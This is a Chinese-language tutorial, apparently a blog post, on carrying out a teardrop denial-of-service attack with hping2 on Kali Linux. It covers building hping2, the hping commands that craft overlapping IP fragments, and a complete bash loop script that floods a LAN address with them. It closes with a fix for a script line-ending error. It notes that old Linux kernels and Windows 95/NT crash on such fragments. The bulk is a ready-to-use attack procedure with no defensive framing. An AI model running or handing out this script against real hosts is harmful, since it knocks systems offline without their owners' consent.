淚滴攻擊

teardrops(淚滴攻擊)

  • 用ssh把hping2.0.0-rc3.tar.gz上傳到kali的 /usr/local目錄下

  • 進入/usr/local目錄并查看其下面的文件

  • 利用tar –zxvf hping2.0.0-rc3.tar.gz命令解壓縮。

  • 進入 /usr/loca/hping2-rc3/ 目錄

  • 利用./configure命令進行配置,最下端有提示你用make命令進行編譯

    • 在redhat下可能會沒有gcc,會出現 cc:command not foud錯誤 ,此時需要安裝gcc
  • 沒有錯誤可以進行編譯,輸入make命令進行編譯;會看到兩項提示的配置。

  • 按照提示以此運行,make strip 和make install 安裝
  • 利用命令 hping2 –h 查看hping2的命令幫助,關于hping2的安裝與查看部分就完成了

  • 構造兩個重疊便宜的IP分片

    • ./hping 192.168.1.1 -1 –x –d 1000 –N 100 –c 1
    • ./hping 192.168.1.1 -1 –d 200 –g 400 –N 100 –c 1
    • //構造了兩個ICMP請求ip包分片,第一個載荷量1000,標識100,第二個載荷量200標識100,但本應偏移量為1008,可他卻設置了400,這樣在分片重組時就會重疊,老的Linux內核(1.x - 2.0.x)在處理這種重疊分片的時候存在問題,WinNT/95在接收到10至50個teardrop分片時也會崩潰。。如果將向上述命令寫入腳本,并用循環語句,持續發送,就成了發送淚滴攻擊的攻擊程序了。
  • 在桌面上已經有寫好的淚滴攻擊程序,用 cat teardrops.sh 命令查看程序內容,如果需要修改目標主機IP,
    用命令vi teardrops.sh進行編輯

    • teardrops.sh腳本:

        #!/bin/bash
        for((i=100;i<150;i++))
        do
        hping 192.168.1.75 -1 -x -d 1000 -N $i -c 1
        hping 192.168.1.75 -1 -d 200 -g 400 -N $i -c 1
        done
      
  • 利用命令.teardrops.sh執行腳本,若出現沒有權限的字符,利用命令chmod 755 teardrops.sh提高權限,若出現v/bin/sh^M:bad interpreter:NO such file ordirectory,請查看下面的注釋一。

  • 重新執行teardrops.sh腳本就實現了淚滴攻擊


注釋一

在Linux中執行.sh腳本,異常/bin/sh^M: bad interpreter: No such file or directory。

分析:這是不同系統編碼格式引起的:在windows系統中編輯的.sh文件可能有不可見字符,所以在Linux系統下執行會報以上異常信息。

解決:1)在windows下轉換:

利用一些編輯器如UltraEdit或EditPlus等工具先將腳本編碼轉換,再放到Linux中執行。轉換方式如下(UltraEdit):File-->Conversions-->DOS->UNIX即可。

2)也可在Linux中轉換:

  • 首先要確保文件有可執行權限
  • sh>chmod a+x filename
  • 然后修改文件格式
  • sh>vi filename
  • 利用如下命令查看文件格式
  • :set ff 或 :set fileformat
  • 可以看到如下信息
    • fileformat=dos 或 fileformat=unix
  • 利用如下命令修改文件格式
  • :set ff=unix 或 :set fileformat=unix
  • :wq (存盤退出)
  • 最后再執行文件
  • sh>./filename
最后編輯于
?著作權歸作者所有,轉載或內容合作請聯系作者
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發布,文章內容僅代表作者本人觀點,簡書系信息發布平臺,僅提供信息存儲服務。

推薦閱讀更多精彩內容